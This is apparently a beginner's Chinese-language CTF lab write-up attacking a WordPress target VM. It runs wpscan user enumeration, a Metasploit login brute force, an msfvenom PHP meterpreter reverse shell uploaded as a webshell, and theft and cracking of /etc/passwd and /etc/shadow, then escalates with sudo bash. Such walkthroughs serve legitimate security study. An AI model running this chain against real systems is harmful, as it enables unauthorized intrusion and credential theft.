小白學習CTF第十二天-web安全暴力破解
web安全暴力破解
資訊探測
資訊探測與之前的探測策略一樣
深入挖掘
http://192.168.56.103/secret/
http://192.168.56.103/secret/wp-login.php
但是發現站點登入不上去,怎麼辦呢?
打不開的網頁可以設定對應的站點,通過把相應的站點改為IP地址即可
gedit /etc/hosts
靶場IP 無法登入的站點
解析一下網頁結構
之後就可以再次登陸了。
暴力破解
首先要檢視使用者名稱
wpscan
wpscan --url www.vtcsec.com/secret/ --enumerate u
得到了使用者名稱以及密碼了。
之後啟動msfconsole
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts
set pass_file /usr/share/wordlists/dirb/common.txt
set user admin
set targeturi /secret/
set rhosts IP
set username admin
run
上傳webshell獲取控制權
製作一個對應的shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw
back
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.253.12
run
run 之後像之前對應的網頁上傳webshell,等待反彈許可權,這裡就不介紹了。
http://192.168.253.20/secret/wp-content/themes/twentysevevteen/404.php
sysinfo
id
root許可權
下載passwd以及shadow
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
之後破解對應的使用者名稱以及密碼。
記得優化終端。
python -c "import pty;pty.spawn('/bin/bash')"
之後準備獲取root許可權。
但是這裡並沒有獲取root許可權,只是一個比普通使用者許可權,我們使用。
su - marlinspike
sudo -l
sudo bash
返回root許可權了。
獲取flag
總結
相關文章
- CTF web安全45天入門學習路線Web
- [CTF/Web] PHP 反序列化學習筆記WebPHP筆記
- 第十二天
- CTF入門學習2->Web基礎瞭解Web
- CTF入門學習3->Web通訊基礎Web
- 2019年小白學習web前端路線圖及學習攻略Web前端
- 小白階段如何學習Web前端知識Web前端
- CTF-PWN學習
- CTF | Web安全 Part1:基礎知識Web
- 第十二天 日報
- 讓小白不走彎路:學習web前端流程,以及學習誤區Web前端
- CTF學習( 4):Misc(大白)
- CTF學習(6):Misc(wireshark)
- CTF學習(15)MISC(FLAG)
- 暴力破解-基於Pikachu的學習
- CTF—web基礎Web
- Python演算法和資料結構學習 第六階段 第十二天Python演算法資料結構
- CTF-flask模板注入學習Flask
- web類靶機暴力破解Web
- Numpy學習第二天
- java學習第二天Java
- 現在學習網路安全來得及嗎?web安全入門學習Web
- 大專學歷可以學網路安全嗎?學習web安全入門Web
- CTF學習(21)MISC(九連環)
- K線學習第二天
- 學習css的第二天CSS
- 學習Go的第二天Go
- 如何提高網路安全技術?如何更好學習web安全Web
- 零基礎學網路安全可以嗎?web安全學習路線Web
- CTF-BugKu-WEB-1-20Web
- CTF-BugKu-WEB-35-41Web
- CTF學習(18)MISC(面具下的flag)
- CTF學習(13)MISC(另一個世界)
- CTF學習(17)MISC(後門查殺)
- java學習第二天 20207/7Java
- Mysql基礎學習第二天MySql
- 第四十二天學習javaJava
- web安全學習目標與計劃的制定Web